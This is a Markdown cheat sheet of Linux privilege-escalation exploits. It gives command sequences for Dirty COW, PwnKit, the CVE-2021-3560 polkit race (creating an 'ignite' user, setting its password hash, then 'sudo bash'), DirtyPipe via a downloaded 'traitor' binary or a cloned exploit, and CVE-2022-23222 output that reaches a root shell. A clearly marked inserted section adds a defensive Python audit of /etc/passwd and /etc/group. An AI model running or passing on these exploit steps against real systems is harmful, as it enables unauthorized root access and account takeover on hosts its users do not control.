# Privilege Escalation via Vulnerabilities

**Linux Dirty COW privilege escalation**

```
https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty -lcrypt
$./dirty passwd 
# Generates the account password
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s
```

**CVE-2021-4034**

```
https://github.com/berdav/CVE-2021-4034
# Just run make, then ./cve-2021-4034, to get a root shell
```

**CVE-2021-3560**

```
# Check how long the command takes to run
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
# Terminate it early (run several times)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
# Generate the password
>openssl passwd -5 ignite@123
# Execute (run several times)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash    # obtain root
```
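From the defender's side, the Dirty COW and CVE-2021-3560 steps above both end in account changes (a generated account password, and a new `ignite` user that can run `sudo bash`), which can be found by auditing `/etc/passwd` and `/etc/group`. The following is an added example, not code from the original page or from any of the linked projects. Assumptions: the admin group names, the baseline set of known administrators, and the sample file contents are constructed for illustration; only the account name `ignite` comes from the commands above.

```python
# Added defensive example; the sample data is constructed, not captured.
ADMIN_GROUPS = {"sudo", "wheel"}  # assumption: admin group names on the host
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
ignite:x:1001:1001:ignite user:/home/ignite:/bin/bash
toor:$5$constructedsalt$constructedhash:0:0:constructed:/root:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice,ignite
alice:x:1000:
ignite:x:1001:
"""

def parse_group(text):
    """Return {group name: (gid, set of member names)} from group(5) text."""
    groups = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[2].isdigit():
            groups[parts[0]] = (int(parts[2]), {m for m in parts[3].split(",") if m})
    return groups

def audit_accounts(passwd_text, group_text, baseline_admins):
    """Return (account, reason) findings for passwd(5)/group(5) text."""
    admins = {n: g for n, g in parse_group(group_text).items() if n in ADMIN_GROUPS}
    admin_gids = {gid for gid, _ in admins.values()}
    admin_members = set().union(*(members for _, members in admins.values()))
    findings = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            continue  # skip malformed lines instead of guessing
        name, pw, uid, gid = parts[0], parts[1], int(parts[2]), int(parts[3])
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append((name, "password hash stored in passwd"))
        if (gid in admin_gids or name in admin_members) and name not in baseline_admins:
            findings.append((name, "admin group member not in baseline"))
    return findings

if __name__ == "__main__":
    for account, reason in audit_accounts(SAMPLE_PASSWD, SAMPLE_GROUP, {"alice"}):
        print(f"{account}: {reason}")
```

On a real host, pass the contents of `/etc/passwd` and `/etc/group` and a baseline of administrators taken from your own inventory.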

**CVE-2022-0847**

```
>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id
# or
>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit
```

**CVE-2022-23222**

```
https://github.com/tr3ee/CVE-2022-23222
```

```bash
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```
